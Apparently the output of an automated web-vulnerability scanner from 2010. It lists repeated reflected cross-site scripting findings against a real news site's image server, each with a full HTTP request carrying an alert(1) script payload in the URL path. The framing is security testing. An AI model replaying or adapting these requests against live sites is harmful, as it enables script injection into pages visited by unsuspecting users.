GET /img/2010/114bec3<script>alert(1)</script>e7bc803c8dc/04/170x128-alg_nancy_pelosi.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:10 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 710b1<script>alert(1)</script>8a3a7088efc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/04710b1<script>alert(1)</script>8a3a7088efc/170x128-alg_nancy_pelosi.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:37 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c03d<script>alert(1)</script>49d47568a8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img9c03d<script>alert(1)</script>49d47568a8d/2010/11/05/130x99-alg_resize_mug_david-cassidy.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:05 GMT Server: Apache Content-Length: 114 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0b95<script>alert(1)</script>8fc2b9d0e48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010f0b95<script>alert(1)</script>8fc2b9d0e48/11/05/130x99-alg_resize_mug_david-cassidy.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:49 GMT Server: Apache Content-Length: 114 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 890e2<script>alert(1)</script>95e445586be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11890e2<script>alert(1)</script>95e445586be/05/130x99-alg_resize_mug_david-cassidy.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:54 GMT Server: Apache Content-Length: 114 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35bea<script>alert(1)</script>d5882465ee9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/0535bea<script>alert(1)</script>d5882465ee9/130x99-alg_resize_mug_david-cassidy.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:21 GMT Server: Apache Content-Length: 114 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ccebf<script>alert(1)</script>5a91b9ef951 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgccebf<script>alert(1)</script>5a91b9ef951/2010/11/05/130x99-cthmb_wag1.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:42 GMT Server: Apache Content-Length: 96 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b879e<script>alert(1)</script>d7e50317d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010b879e<script>alert(1)</script>d7e50317d/11/05/130x99-cthmb_wag1.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:53 GMT Server: Apache Content-Length: 94 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5cb32<script>alert(1)</script>1f5a4858ecc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/115cb32<script>alert(1)</script>1f5a4858ecc/05/130x99-cthmb_wag1.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:59 GMT Server: Apache Content-Length: 96 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f77a9<script>alert(1)</script>d5f3c4605b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/05f77a9<script>alert(1)</script>d5f3c4605b0/130x99-cthmb_wag1.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:04 GMT Server: Apache Content-Length: 96 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53702<script>alert(1)</script>70583dd3af5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img53702<script>alert(1)</script>70583dd3af5/2010/11/05/130x99-gthmb_tinyfood.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:47 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fdc4d<script>alert(1)</script>4ca8be14fca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010fdc4d<script>alert(1)</script>4ca8be14fca/11/05/130x99-gthmb_tinyfood.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:50 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5a17<script>alert(1)</script>b4a9ea391c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11b5a17<script>alert(1)</script>b4a9ea391c0/05/130x99-gthmb_tinyfood.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:58 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bdece<script>alert(1)</script>3b02ad2a347 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/05bdece<script>alert(1)</script>3b02ad2a347/130x99-gthmb_tinyfood.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:03 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3f8a7<script>alert(1)</script>ebcaee264ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img3f8a7<script>alert(1)</script>ebcaee264ec/2010/11/05/170x128-alg_george_bush_whitehouse.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:49 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fcd4b<script>alert(1)</script>d8eda388ea3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010fcd4b<script>alert(1)</script>d8eda388ea3/11/05/170x128-alg_george_bush_whitehouse.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:15 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8adcb<script>alert(1)</script>53845b0cb66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/118adcb<script>alert(1)</script>53845b0cb66/05/170x128-alg_george_bush_whitehouse.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:03 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4213f<script>alert(1)</script>8e6e8a1ed66 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/054213f<script>alert(1)</script>8e6e8a1ed66/170x128-alg_george_bush_whitehouse.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:08 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a09c4<script>alert(1)</script>5cc995d0a90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imga09c4<script>alert(1)</script>5cc995d0a90/2010/11/06/110x83-alg_cookie2.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:00 GMT Server: Apache Content-Length: 97 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6fac5<script>alert(1)</script>e49e723d2f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/20106fac5<script>alert(1)</script>e49e723d2f1/11/06/110x83-alg_cookie2.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:45 GMT Server: Apache Content-Length: 97 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7a955<script>alert(1)</script>125e3478cae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/117a955<script>alert(1)</script>125e3478cae/06/110x83-alg_cookie2.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:50 GMT Server: Apache Content-Length: 97 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 166b5<script>alert(1)</script>92899da0c78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/06166b5<script>alert(1)</script>92899da0c78/110x83-alg_cookie2.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:58 GMT Server: Apache Content-Length: 97 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 82c79<script>alert(1)</script>084a36b460 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img82c79<script>alert(1)</script>084a36b460/2010/11/06/130x99-gthmb_mount_merapi.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:53 GMT Server: Apache Content-Length: 103 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9351<script>alert(1)</script>3936811d0bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010c9351<script>alert(1)</script>3936811d0bb/11/06/130x99-gthmb_mount_merapi.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:58 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53cbf<script>alert(1)</script>c4256903aa2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/1153cbf<script>alert(1)</script>c4256903aa2/06/130x99-gthmb_mount_merapi.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:42 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29a98<script>alert(1)</script>dc73a46ca0e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/0629a98<script>alert(1)</script>dc73a46ca0e/130x99-gthmb_mount_merapi.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:50 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a55e<script>alert(1)</script>0649342c242 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img5a55e<script>alert(1)</script>0649342c242/2010/11/06/130x99-gthmb_sculpture.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:30 GMT Server: Apache Content-Length: 101 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99099<script>alert(1)</script>4d6c607fde9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201099099<script>alert(1)</script>4d6c607fde9/11/06/130x99-gthmb_sculpture.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:57 GMT Server: Apache Content-Length: 101 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a2006<script>alert(1)</script>0311095c912 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11a2006<script>alert(1)</script>0311095c912/06/130x99-gthmb_sculpture.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:03 GMT Server: Apache Content-Length: 101 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a54f5<script>alert(1)</script>c0d09c09695 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/06a54f5<script>alert(1)</script>c0d09c09695/130x99-gthmb_sculpture.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:46 GMT Server: Apache Content-Length: 101 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload af340<script>alert(1)</script>e0791cfee16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgaf340<script>alert(1)</script>e0791cfee16/2010/11/06/130x99-gthmb_who-wore.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:33 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1558<script>alert(1)</script>214ada26826 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010c1558<script>alert(1)</script>214ada26826/11/06/130x99-gthmb_who-wore.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:35 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9d1ec<script>alert(1)</script>0784274a982 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/119d1ec<script>alert(1)</script>0784274a982/06/130x99-gthmb_who-wore.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:02 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff0d<script>alert(1)</script>f4f730baee6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/06dff0d<script>alert(1)</script>f4f730baee6/130x99-gthmb_who-wore.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:42 GMT Server: Apache Content-Length: 100 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5cb1<script>alert(1)</script>84568f44718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgf5cb1<script>alert(1)</script>84568f44718/2010/11/06/170x128-alg_conan_obrien_portrait.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:54 GMT Server: Apache Content-Length: 111 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26cb8<script>alert(1)</script>989cfba1788 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201026cb8<script>alert(1)</script>989cfba1788/11/06/170x128-alg_conan_obrien_portrait.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:36 GMT Server: Apache Content-Length: 111 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4f617<script>alert(1)</script>81ce82f2dd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/114f617<script>alert(1)</script>81ce82f2dd3/06/170x128-alg_conan_obrien_portrait.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:39 GMT Server: Apache Content-Length: 111 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c24fd<script>alert(1)</script>bbe8664d2ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
